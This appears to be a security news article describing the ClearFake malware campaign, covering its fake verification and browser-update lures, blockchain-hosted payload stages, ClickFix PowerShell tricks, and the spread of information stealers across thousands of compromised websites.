ClearFake Attack Campaign

The cyber threat actors behind the ClearFake campaign have been using fake reCAPTCHA and Cloudflare Turnstile verifications to trick unsuspecting users into downloading malware. These deceptive techniques are employed to distribute information-stealing malware such as the Lumma Stealer and the Vidar Stealer.

Fake Browser Updates as a Malware Trap

First identified in July 2023, ClearFake is a malicious campaign that spreads through compromised WordPress sites, using fake web browser update prompts to lure victims. This method has been a favored technique for cybercriminals looking to deploy malware efficiently.

Leveraging EtherHiding for Stealth and Persistence

A key aspect of ClearFake's infection chain is EtherHiding, a technique that allows attackers to fetch the next-stage payload using Binance's Smart Chain (BSC) contracts. This approach enhances the resilience of the attack by leveraging decentralized blockchain technology, making detection and takedown efforts more challenging.

The Emergence of ClickFix: A Social Engineering Ploy

By May 2024, ClearFake had incorporated ClickFix, a social engineering trick designed to deceive users into executing malicious PowerShell code under the false pretense of fixing a non-existent technical issue. This technique helps attackers gain further control over the victim's system.

Advanced Web3 Capabilities in ClearFake’s Latest Variant

The latest iterations of the ClearFake campaign continue to employ EtherHiding and ClickFix, but with notable advancements. These updates include:

• Greater interaction with Binance Smart Chain, using smart contract Application Binary Interfaces (ABIs).
• Enhanced fingerprinting of victims' systems, loading multiple JavaScript codes and resources.
• Encrypted ClickFix HTML code to evade security analysis.

A Multi-Stage Attack with Encrypted Payloads

Once a victim visits a compromised website, the attack unfolds in several stages:

• Retrieval of JavaScript from Binance Smart Chain to gather system information.
• Fetching an encrypted ClickFix script from Cloudflare Pages.
• Execution of a malicious PowerShell command, leading to malware deployment.

If the victim proceeds with the malicious action, the Emmenhtal Loader (aka PEAKLIGHT) is executed, which ultimately installs Lumma Stealer on the system.

Evolving Tactics: A Large-Scale Threat

By January 2025, security researchers observed new ClearFake attack chains utilizing PowerShell loaders to install Vidar Stealer. As of last month, at least 9,300 websites have been compromised.

Attackers continuously update the ClearFake framework, modifying its lures, scripts, and payloads daily. The malware now stores multiple key elements within Binance Smart Chain, including:

• JavaScript code
• AES encryption keys
• URLs hosting malicious lure files
• ClickFix PowerShell commands

Mass Infections and Widespread Exposure

The scale of ClearFake infections is significant, affecting a vast number of users worldwide. In July 2024, approximately 200,000 unique users were potentially exposed to ClearFake lures that prompted them to download malware.

ClickFix Compromises Auto Dealership Websites

A significant attack vector for ClickFix has been auto dealership websites. Over 100 dealership sites were compromised, with the SectopRAT malware being delivered via ClickFix lures.

However, the dealerships' own websites were not directly infected. Instead, the compromise occurred through a third-party video service that unknowingly hosted the compromised JavaScript injection. This incident appears to be a supply chain attack, highlighting the risks posed by vulnerabilities in third-party services. The malicious script has since been removed from the infected site.

Final Thoughts: A Persistent and Expanding Threat

The ClearFake campaign continues to evolve, leveraging advanced blockchain-based techniques, social engineering, and multi-stage infection chains. The scale of its impact, with thousands of compromised sites and hundreds of thousands of potential victims, underscores the urgent need for robust cybersecurity measures to defend against such sophisticated malware threats.